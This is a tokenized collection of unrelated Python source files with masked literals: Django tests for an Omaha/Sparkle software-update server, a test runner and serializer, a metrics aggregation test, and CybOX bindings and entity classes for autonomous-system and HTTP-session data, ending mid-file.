<NUM_LIT> ) <EOL> version = VersionFactory . create ( file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT>' ) ) <EOL> version_beta = Version . objects . create ( <EOL> file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT>' ) , <EOL> app = version . app , <EOL> platform = version . platform , <EOL> channel = version . channel , <EOL> version = '<STR_LIT>' , <EOL> ) <EOL> PartialUpdate . objects . create ( version = version_beta , <EOL> percent = <NUM_LIT:5> , <EOL> start_date = datetime . now ( ) , <EOL> end_date = datetime . now ( ) , <EOL> active_users = ACTIVE_USERS_DICT_CHOICES [ '<STR_LIT:all>' ] ) <EOL> self . assertEqual ( version , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid ) ) <EOL> self . assertEqual ( version_beta , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid_beta ) ) <EOL> def test_get_app_version_channel ( self ) : <EOL> userid = '<STR_LIT>' <EOL> channel_beta = Channel . objects . create ( name = "<STR_LIT>" ) <EOL> version = VersionFactory . create ( file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT>' ) ) <EOL> version_beta = Version . objects . create ( <EOL> file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT>' ) , <EOL> app = version . app , <EOL> platform = version . platform , <EOL> channel = channel_beta , <EOL> version = '<STR_LIT>' , <EOL> ) <EOL> self . assertEqual ( version_beta , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> channel_beta . name , <EOL> '<STR_LIT>' , <EOL> userid ) ) <EOL> def test_get_app_version_exlude_new_users ( self ) : <EOL> userid = "<STR_LIT>" % UUID ( int = <NUM_LIT:1> ) <EOL> userid_beta = "<STR_LIT>" % UUID ( int = <NUM_LIT> ) <EOL> version = VersionFactory . create ( file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT>' ) ) <EOL> version_beta = Version . objects . create ( <EOL> file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT>' ) , <EOL> app = version . app , <EOL> platform = version . platform , <EOL> channel = version . channel , <EOL> version = '<STR_LIT>' , <EOL> ) <EOL> PartialUpdate . objects . create ( version = version_beta , <EOL> percent = <NUM_LIT:5> , <EOL> start_date = datetime . now ( ) , <EOL> end_date = datetime . now ( ) , <EOL> active_users = ACTIVE_USERS_DICT_CHOICES [ '<STR_LIT:all>' ] ) <EOL> self . assertEqual ( version , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid ) ) <EOL> self . assertEqual ( version_beta , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid_beta ) ) <EOL> self . assertEqual ( version , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid_beta ) ) <EOL> def test_get_app_version_active_users ( self ) : <EOL> userid = "<STR_LIT>" % UUID ( int = <NUM_LIT:1> ) <EOL> userid_beta = "<STR_LIT>" % UUID ( int = <NUM_LIT> ) <EOL> userid_beta_not_active = "<STR_LIT>" % UUID ( int = <NUM_LIT> ) <EOL> version = VersionFactory . create ( file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT>' ) ) <EOL> version_beta = Version . objects . create ( <EOL> file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT>' ) , <EOL> app = version . app , <EOL> platform = version . platform , <EOL> channel = version . channel , <EOL> version = '<STR_LIT>' , <EOL> ) <EOL> id = get_id ( userid_beta ) <EOL> mark_event ( '<STR_LIT>' , id ) <EOL> PartialUpdate . objects . create ( version = version_beta , <EOL> percent = <NUM_LIT:5> , <EOL> start_date = datetime . now ( ) , <EOL> end_date = datetime . now ( ) ) <EOL> self . assertEqual ( version , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid ) ) <EOL> self . assertEqual ( version_beta , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid_beta ) ) <EOL> self . assertEqual ( version , get_version ( version . app . pk , <EOL> version . platform . name , <EOL> version . channel . name , <EOL> '<STR_LIT>' , <EOL> userid_beta_not_active ) ) </s>
<s> from django_nose . runner import NoseTestSuiteRunner <EOL> from django . db import connections <EOL> from copy import copy <EOL> class PublicPrivateNoseTestSuiteRunner ( NoseTestSuiteRunner ) : <EOL> def setup_databases ( self ) : <EOL> res = super ( PublicPrivateNoseTestSuiteRunner , self ) . setup_databases ( ) <EOL> connections . databases [ '<STR_LIT:root>' ] = copy ( connections . databases [ '<STR_LIT:default>' ] ) <EOL> connections . close_all ( ) <EOL> return res </s>
<s> """<STR_LIT>""" <EOL> from rest_framework import serializers <EOL> from omaha . models import Application , Channel <EOL> from sparkle . models import SparkleVersion <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class SparkleVersionSerializer ( serializers . HyperlinkedModelSerializer ) : <EOL> is_enabled = serializers . BooleanField ( default = True , required = False ) <EOL> app = serializers . PrimaryKeyRelatedField ( queryset = Application . objects . all ( ) ) <EOL> channel = serializers . PrimaryKeyRelatedField ( queryset = Channel . objects . all ( ) ) <EOL> version = serializers . CharField ( ) <EOL> class Meta : <EOL> model = SparkleVersion <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:version>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:file>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> read_only_fields = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def create ( self , validated_data ) : <EOL> if not validated_data . get ( '<STR_LIT>' ) : <EOL> file = validated_data [ '<STR_LIT:file>' ] <EOL> validated_data [ '<STR_LIT>' ] = file . size <EOL> return super ( SparkleVersionSerializer , self ) . create ( validated_data ) </s>
<s> </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from greplin . scales import aggregation <EOL> import unittest <EOL> class AggregationTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testNoData ( self ) : <EOL> "<STR_LIT>" <EOL> agg = aggregation . Aggregation ( { <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:*>' : [ aggregation . Sum ( ) ] <EOL> } <EOL> } ) <EOL> agg . addSource ( '<STR_LIT>' , { '<STR_LIT:a>' : { } } ) <EOL> agg . result ( ) <EOL> def testRegex ( self ) : <EOL> "<STR_LIT>" <EOL> agg = aggregation . Aggregation ( { <EOL> '<STR_LIT:a>' : { <EOL> ( '<STR_LIT:success>' , re . compile ( "<STR_LIT>" ) ) : [ aggregation . Sum ( dataFormat = aggregation . DataFormats . DIRECT ) ] , <EOL> ( '<STR_LIT:error>' , re . compile ( "<STR_LIT>" ) ) : [ aggregation . Sum ( dataFormat = aggregation . DataFormats . DIRECT ) ] <EOL> } } ) <EOL> agg . addSource ( '<STR_LIT>' , { '<STR_LIT:a>' : { '<STR_LIT>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:3> } } ) <EOL> result = agg . result ( ) <EOL> self . assertEquals ( result [ '<STR_LIT:a>' ] [ '<STR_LIT:success>' ] [ '<STR_LIT>' ] , <NUM_LIT:20> ) <EOL> self . assertEquals ( result [ '<STR_LIT:a>' ] [ '<STR_LIT:error>' ] [ '<STR_LIT>' ] , <NUM_LIT:4> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import sys <EOL> from mixbox . binding_utils import * <EOL> from . import cybox_common <EOL> class ASObjectType ( cybox_common . ObjectPropertiesType ) : <EOL> """<STR_LIT>""" <EOL> subclass = None <EOL> superclass = cybox_common . ObjectPropertiesType <EOL> def __init__ ( self , object_reference = None , Custom_Properties = None , xsi_type = None , Number = None , Name = None , Handle = None , Regional_Internet_Registry = None ) : <EOL> super ( ASObjectType , self ) . __init__ ( object_reference , Custom_Properties , xsi_type ) <EOL> self . Number = Number <EOL> self . Name = Name <EOL> self . Handle = Handle <EOL> self . Regional_Internet_Registry = Regional_Internet_Registry <EOL> def factory ( * args_ , ** kwargs_ ) : <EOL> if ASObjectType . subclass : <EOL> return ASObjectType . subclass ( * args_ , ** kwargs_ ) <EOL> else : <EOL> return ASObjectType ( * args_ , ** kwargs_ ) <EOL> factory = staticmethod ( factory ) <EOL> def get_Number ( self ) : return self . Number <EOL> def set_Number ( self , Number ) : self . Number = Number <EOL> def validate_NonNegativeIntegerObjectPropertyType ( self , value ) : <EOL> pass <EOL> def get_Name ( self ) : return self . Name <EOL> def set_Name ( self , Name ) : self . Name = Name <EOL> def validate_StringObjectPropertyType ( self , value ) : <EOL> pass <EOL> def get_Handle ( self ) : return self . Handle <EOL> def set_Handle ( self , Handle ) : self . Handle = Handle <EOL> def get_Regional_Internet_Registry ( self ) : return self . Regional_Internet_Registry <EOL> def set_Regional_Internet_Registry ( self , Regional_Internet_Registry ) : self . Regional_Internet_Registry = Regional_Internet_Registry <EOL> def validate_RegionalRegistryType ( self , value ) : <EOL> pass <EOL> def hasContent_ ( self ) : <EOL> if ( <EOL> self . Number is not None or <EOL> self . Name is not None or <EOL> self . Handle is not None or <EOL> self . Regional_Internet_Registry is not None or <EOL> super ( ASObjectType , self ) . hasContent_ ( ) <EOL> ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def export ( self , lwrite , level , namespace_ = '<STR_LIT>' , name_ = '<STR_LIT>' , namespacedef_ = '<STR_LIT>' , pretty_print = True ) : <EOL> if pretty_print : <EOL> eol_ = '<STR_LIT:\n>' <EOL> else : <EOL> eol_ = '<STR_LIT>' <EOL> showIndent ( lwrite , level , pretty_print ) <EOL> lwrite ( '<STR_LIT>' % ( namespace_ , name_ , namespacedef_ and '<STR_LIT:U+0020>' + namespacedef_ or '<STR_LIT>' , ) ) <EOL> already_processed = set ( ) <EOL> self . exportAttributes ( lwrite , level , already_processed , namespace_ , name_ = '<STR_LIT>' ) <EOL> if self . hasContent_ ( ) : <EOL> lwrite ( '<STR_LIT>' % ( eol_ , ) ) <EOL> self . exportChildren ( lwrite , level + <NUM_LIT:1> , namespace_ , name_ , pretty_print = pretty_print ) <EOL> showIndent ( lwrite , level , pretty_print ) <EOL> lwrite ( '<STR_LIT>' % ( namespace_ , name_ , eol_ ) ) <EOL> else : <EOL> lwrite ( '<STR_LIT>' % ( eol_ , ) ) <EOL> def exportAttributes ( self , lwrite , level , already_processed , namespace_ = '<STR_LIT>' , name_ = '<STR_LIT>' ) : <EOL> super ( ASObjectType , self ) . exportAttributes ( lwrite , level , already_processed , namespace_ , name_ = '<STR_LIT>' ) <EOL> def exportChildren ( self , lwrite , level , namespace_ = '<STR_LIT>' , name_ = '<STR_LIT>' , fromsubclass_ = False , pretty_print = True ) : <EOL> super ( ASObjectType , self ) . exportChildren ( lwrite , level , '<STR_LIT>' , name_ , True , pretty_print = pretty_print ) <EOL> if pretty_print : <EOL> eol_ = '<STR_LIT:\n>' <EOL> else : <EOL> eol_ = '<STR_LIT>' <EOL> if self . Number is not None : <EOL> self . Number . export ( lwrite , level , '<STR_LIT>' , name_ = '<STR_LIT>' , pretty_print = pretty_print ) <EOL> if self . Name is not None : <EOL> self . Name . export ( lwrite , level , '<STR_LIT>' , name_ = '<STR_LIT:Name>' , pretty_print = pretty_print ) <EOL> if self . Handle is not None : <EOL> self . Handle . export ( lwrite , level , '<STR_LIT>' , name_ = '<STR_LIT>' , pretty_print = pretty_print ) <EOL> if self . Regional_Internet_Registry is not None : <EOL> self . Regional_Internet_Registry . export ( lwrite , level , '<STR_LIT>' , name_ = '<STR_LIT>' , pretty_print = pretty_print ) <EOL> def build ( self , node ) : <EOL> already_processed = set ( ) <EOL> self . buildAttributes ( node , node . attrib , already_processed ) <EOL> for child in node : <EOL> nodeName_ = Tag_pattern_ . match ( child . tag ) . groups ( ) [ - <NUM_LIT:1> ] <EOL> self . buildChildren ( child , node , nodeName_ ) <EOL> def buildAttributes ( self , node , attrs , already_processed ) : <EOL> super ( ASObjectType , self ) . buildAttributes ( node , attrs , already_processed ) <EOL> def buildChildren ( self , child_ , node , nodeName_ , fromsubclass_ = False ) : <EOL> if nodeName_ == '<STR_LIT>' : <EOL> obj_ = cybox_common . NonNegativeIntegerObjectPropertyType . factory ( ) <EOL> obj_ . build ( child_ ) <EOL> self . set_Number ( obj_ ) <EOL> elif nodeName_ == '<STR_LIT:Name>' : <EOL> obj_ = cybox_common . StringObjectPropertyType . factory ( ) <EOL> obj_ . build ( child_ ) <EOL> self . set_Name ( obj_ ) <EOL> elif nodeName_ == '<STR_LIT>' : <EOL> obj_ = cybox_common . StringObjectPropertyType . factory ( ) <EOL> obj_ . build ( child_ ) <EOL> self . set_Handle ( obj_ ) <EOL> elif nodeName_ == '<STR_LIT>' : <EOL> obj_ = cybox_common . RegionalRegistryType . factory ( ) <EOL> obj_ . build ( child_ ) <EOL> self . set_Regional_Internet_Registry ( obj_ ) <EOL> super ( ASObjectType , self ) . buildChildren ( child_ , node , nodeName_ , True ) <EOL> GDSClassesMapping = { <EOL> '<STR_LIT>' : cybox_common . BuildUtilityType , <EOL> '<STR_LIT>' : cybox_common . EndiannessType , <EOL> '<STR_LIT>' : cybox_common . ErrorsType , <EOL> '<STR_LIT>' : cybox_common . TimeType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . MetadataType , <EOL> '<STR_LIT>' : cybox_common . HashType , <EOL> '<STR_LIT>' : cybox_common . ControlledVocabularyStringType , <EOL> '<STR_LIT>' : cybox_common . InternalStringsType , <EOL> '<STR_LIT>' : cybox_common . FuzzyHashStructureType , <EOL> '<STR_LIT>' : cybox_common . MetadataType , <EOL> '<STR_LIT>' : cybox_common . HashValueType , <EOL> '<STR_LIT>' : cybox_common . DigitalSignatureInfoType , <EOL> '<STR_LIT>' : cybox_common . CodeSnippetsType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . DateTimeWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . ToolReferenceType , <EOL> '<STR_LIT>' : cybox_common . ControlledVocabularyStringType , <EOL> '<STR_LIT>' : cybox_common . InternationalizationSettingsType , <EOL> '<STR_LIT>' : cybox_common . ToolConfigurationType , <EOL> '<STR_LIT>' : cybox_common . CompilerType , <EOL> '<STR_LIT>' : cybox_common . DateWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . FunctionsType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . PlatformSpecificationType , <EOL> '<STR_LIT>' : cybox_common . CompilerInformalDescriptionType , <EOL> '<STR_LIT>' : cybox_common . DateTimeWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . ObjectPropertiesType , <EOL> '<STR_LIT>' : cybox_common . PlatformSpecificationType , <EOL> '<STR_LIT>' : cybox_common . UsageContextAssumptionsType , <EOL> '<STR_LIT>' : cybox_common . ControlledVocabularyStringType , <EOL> '<STR_LIT>' : cybox_common . CompilersType , <EOL> '<STR_LIT>' : cybox_common . ControlledVocabularyStringType , <EOL> '<STR_LIT>' : cybox_common . ExtractedStringType , <EOL> '<STR_LIT>' : cybox_common . CustomPropertiesType , <EOL> '<STR_LIT>' : cybox_common . BuildInformationType , <EOL> '<STR_LIT>' : cybox_common . HashListType , <EOL> '<STR_LIT>' : cybox_common . LocationType , <EOL> '<STR_LIT>' : cybox_common . ErrorInstancesType , <EOL> '<STR_LIT>' : cybox_common . DateWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . CompensationModelType , <EOL> '<STR_LIT>' : cybox_common . PropertyType , <EOL> '<STR_LIT>' : cybox_common . ExtractedStringsType , <EOL> '<STR_LIT>' : cybox_common . PersonnelType , <EOL> '<STR_LIT>' : cybox_common . ObjectPropertiesType , <EOL> '<STR_LIT>' : cybox_common . ConfigurationSettingsType , <EOL> '<STR_LIT>' : cybox_common . SimpleHashValueType , <EOL> '<STR_LIT>' : cybox_common . HexBinaryObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . DateTimeWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . ObjectPropertiesType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . RegionalRegistryType , <EOL> '<STR_LIT>' : cybox_common . PlatformIdentifierType , <EOL> '<STR_LIT>' : cybox_common . ToolSpecificDataType , <EOL> '<STR_LIT>' : cybox_common . ExecutionEnvironmentType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . DependenciesType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . DateRangeType , <EOL> '<STR_LIT>' : cybox_common . HashListType , <EOL> '<STR_LIT>' : cybox_common . HashSegmentsType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StructuredTextType , <EOL> '<STR_LIT>' : cybox_common . FuzzyHashBlockType , <EOL> '<STR_LIT>' : cybox_common . DependencyType , <EOL> '<STR_LIT>' : cybox_common . ErrorType , <EOL> '<STR_LIT>' : cybox_common . HexBinaryObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . EnvironmentVariableType , <EOL> '<STR_LIT>' : cybox_common . ByteRunType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . ImportsType , <EOL> '<STR_LIT>' : cybox_common . NonNegativeIntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . LibraryType , <EOL> '<STR_LIT>' : cybox_common . ToolReferencesType , <EOL> '<STR_LIT>' : cybox_common . DateTimeWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . HashValueType , <EOL> '<STR_LIT>' : cybox_common . ConfigurationSettingType , <EOL> '<STR_LIT>' : cybox_common . LocationType , <EOL> '<STR_LIT>' : cybox_common . LibrariesType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StructuredTextType , <EOL> '<STR_LIT>' : cybox_common . ObjectPropertiesType , <EOL> '<STR_LIT>' : cybox_common . BuildConfigurationType , <EOL> '<STR_LIT>' : cybox_common . HexBinaryObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . HashSegmentType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT:Name>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . PlatformSpecificationType , <EOL> '<STR_LIT>' : cybox_common . FuzzyHashValueType , <EOL> '<STR_LIT>' : cybox_common . DataSizeType , <EOL> '<STR_LIT>' : cybox_common . StructuredTextType , <EOL> '<STR_LIT>' : cybox_common . DateTimeWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . ContributorType , <EOL> '<STR_LIT>' : cybox_common . ToolsInformationType , <EOL> '<STR_LIT>' : cybox_common . ToolInformationType , <EOL> } <EOL> USAGE_TEXT = """<STR_LIT>""" <EOL> def usage ( ) : <EOL> print ( USAGE_TEXT ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def get_root_tag ( node ) : <EOL> tag = Tag_pattern_ . match ( node . tag ) . groups ( ) [ - <NUM_LIT:1> ] <EOL> rootClass = GDSClassesMapping . get ( tag ) <EOL> if rootClass is None : <EOL> rootClass = globals ( ) . get ( tag ) <EOL> return tag , rootClass <EOL> def parse ( inFileName ) : <EOL> doc = parsexml_ ( inFileName ) <EOL> rootNode = doc . getroot ( ) <EOL> rootTag , rootClass = get_root_tag ( rootNode ) <EOL> if rootClass is None : <EOL> rootTag = '<STR_LIT>' <EOL> rootClass = ASObjectType <EOL> rootObj = rootClass . factory ( ) <EOL> rootObj . build ( rootNode ) <EOL> doc = None <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> rootObj . export ( sys . stdout . write , <NUM_LIT:0> , name_ = rootTag , <EOL> namespacedef_ = '<STR_LIT>' , <EOL> pretty_print = True ) <EOL> return rootObj <EOL> def parseEtree ( inFileName ) : <EOL> doc = parsexml_ ( inFileName ) <EOL> rootNode = doc . getroot ( ) <EOL> rootTag , rootClass = get_root_tag ( rootNode ) <EOL> if rootClass is None : <EOL> rootTag = '<STR_LIT>' <EOL> rootClass = ASObjectType <EOL> rootObj = rootClass . factory ( ) <EOL> rootObj . build ( rootNode ) <EOL> doc = None <EOL> rootElement = rootObj . to_etree ( None , name_ = rootTag ) <EOL> content = etree_ . tostring ( rootElement , pretty_print = True , <EOL> xml_declaration = True , encoding = "<STR_LIT:utf-8>" ) <EOL> sys . stdout . write ( content ) <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) <EOL> return rootObj , rootElement <EOL> def parseString ( inString ) : <EOL> from mixbox . vendor . six import StringIO <EOL> doc = parsexml_ ( StringIO ( inString ) ) <EOL> rootNode = doc . getroot ( ) <EOL> rootTag , rootClass = get_root_tag ( rootNode ) <EOL> if rootClass is None : <EOL> rootTag = '<STR_LIT>' <EOL> rootClass = ASObjectType <EOL> rootObj = rootClass . factory ( ) <EOL> rootObj . build ( rootNode ) <EOL> doc = None <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> rootObj . export ( sys . stdout . write , <NUM_LIT:0> , name_ = "<STR_LIT>" , <EOL> namespacedef_ = '<STR_LIT>' ) <EOL> return rootObj <EOL> def main ( ) : <EOL> args = sys . argv [ <NUM_LIT:1> : ] <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> parse ( args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> usage ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) <EOL> __all__ = [ <EOL> "<STR_LIT>" ] </s>
<s> from mixbox import entities <EOL> from mixbox import fields <EOL> import cybox . bindings . http_session_object as http_session_binding <EOL> from cybox . objects . uri_object import URI <EOL> from cybox . objects . address_object import EmailAddress <EOL> from cybox . objects . port_object import Port <EOL> from cybox . common import ObjectProperties , String , DateTime , PositiveInteger , Integer <EOL> class HTTPRequestLine ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPRequestLineType <EOL> _namespace = "<STR_LIT>" <EOL> http_method = fields . TypedField ( "<STR_LIT>" , String ) <EOL> value = fields . TypedField ( "<STR_LIT>" , String ) <EOL> version = fields . TypedField ( "<STR_LIT>" , String ) <EOL> class HostField ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HostFieldType <EOL> _namespace = "<STR_LIT>" <EOL> domain_name = fields . TypedField ( "<STR_LIT>" , URI ) <EOL> port = fields . TypedField ( "<STR_LIT>" , Port ) <EOL> class HTTPRequestHeaderFields ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPRequestHeaderFieldsType <EOL> _namespace = "<STR_LIT>" <EOL> accept = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_charset = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_language = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_datetime = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_encoding = fields . TypedField ( "<STR_LIT>" , String ) <EOL> authorization = fields . TypedField ( "<STR_LIT>" , String ) <EOL> cache_control = fields . TypedField ( "<STR_LIT>" , String ) <EOL> connection = fields . TypedField ( "<STR_LIT>" , String ) <EOL> cookie = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_length = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> content_md5 = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_type = fields . TypedField ( "<STR_LIT>" , String ) <EOL> date = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> expect = fields . TypedField ( "<STR_LIT>" , String ) <EOL> from_ = fields . TypedField ( "<STR_LIT>" , EmailAddress ) <EOL> host = fields . TypedField ( "<STR_LIT>" , HostField ) <EOL> if_match = fields . TypedField ( "<STR_LIT>" , String ) <EOL> if_modified_since = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> if_none_match = fields . TypedField ( "<STR_LIT>" , String ) <EOL> if_range = fields . TypedField ( "<STR_LIT>" , String ) <EOL> if_unmodified_since = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> max_forwards = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> pragma = fields . TypedField ( "<STR_LIT>" , String ) <EOL> proxy_authorization = fields . TypedField ( "<STR_LIT>" , String ) <EOL> range_ = fields . TypedField ( "<STR_LIT>" , String ) <EOL> referer = fields . TypedField ( "<STR_LIT>" , URI ) <EOL> te = fields . TypedField ( "<STR_LIT>" , String ) <EOL> user_agent = fields . TypedField ( "<STR_LIT>" , String ) <EOL> via = fields . TypedField ( "<STR_LIT>" , String ) <EOL> warning = fields . TypedField ( "<STR_LIT>" , String ) <EOL> dnt = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_requested_with = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_forwarded_for = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_forwarded_proto = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_att_deviceid = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_wap_profile = fields . TypedField ( "<STR_LIT>" , URI ) <EOL> class HTTPRequestHeader ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPRequestHeaderType <EOL> _namespace = "<STR_LIT>" <EOL> raw_header = fields . TypedField ( "<STR_LIT>" , String ) <EOL> parsed_header = fields . TypedField ( "<STR_LIT>" , HTTPRequestHeaderFields ) <EOL> class HTTPMessage ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPMessageType <EOL> _namespace = "<STR_LIT>" <EOL> length = fields . TypedField ( "<STR_LIT>" , PositiveInteger ) <EOL> message_body = fields . TypedField ( "<STR_LIT>" , String ) <EOL> class HTTPClientRequest ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPClientRequestType <EOL> _namespace = "<STR_LIT>" <EOL> http_request_line = fields . TypedField ( "<STR_LIT>" , HTTPRequestLine ) <EOL> http_request_header = fields . TypedField ( "<STR_LIT>" , <EOL> HTTPRequestHeader ) <EOL> http_message_body = fields . TypedField ( "<STR_LIT>" , HTTPMessage ) <EOL> class HTTPStatusLine ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPStatusLineType <EOL> _namespace = "<STR_LIT>" <EOL> version = fields . TypedField ( "<STR_LIT>" , String ) <EOL> status_code = fields . TypedField ( "<STR_LIT>" , PositiveInteger ) <EOL> reason_phrase = fields . TypedField ( "<STR_LIT>" , String ) <EOL> class HTTPResponseHeaderFields ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPResponseHeaderFieldsType <EOL> _namespace = "<STR_LIT>" <EOL> access_control_allow_origin = fields . TypedField ( "<STR_LIT>" , String ) <EOL> accept_ranges = fields . TypedField ( "<STR_LIT>" , String ) <EOL> age = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> cache_control = fields . TypedField ( "<STR_LIT>" , String ) <EOL> connection = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_encoding = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_language = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_length = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> content_location = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_md5 = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_disposition = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_range = fields . TypedField ( "<STR_LIT>" , String ) <EOL> content_type = fields . TypedField ( "<STR_LIT>" , String ) <EOL> date = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> etag = fields . TypedField ( "<STR_LIT>" , String ) <EOL> expires = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> last_modified = fields . TypedField ( "<STR_LIT>" , DateTime ) <EOL> link = fields . TypedField ( "<STR_LIT>" , String ) <EOL> location = fields . TypedField ( "<STR_LIT>" , URI ) <EOL> p3p = fields . TypedField ( "<STR_LIT>" , String ) <EOL> pragma = fields . TypedField ( "<STR_LIT>" , String ) <EOL> proxy_authenticate = fields . TypedField ( "<STR_LIT>" , String ) <EOL> refresh = fields . TypedField ( "<STR_LIT>" , String ) <EOL> retry_after = fields . TypedField ( "<STR_LIT>" , Integer ) <EOL> server = fields . TypedField ( "<STR_LIT>" , String ) <EOL> set_cookie = fields . TypedField ( "<STR_LIT>" , String ) <EOL> strict_transport_security = fields . TypedField ( "<STR_LIT>" , <EOL> String ) <EOL> trailer = fields . TypedField ( "<STR_LIT>" 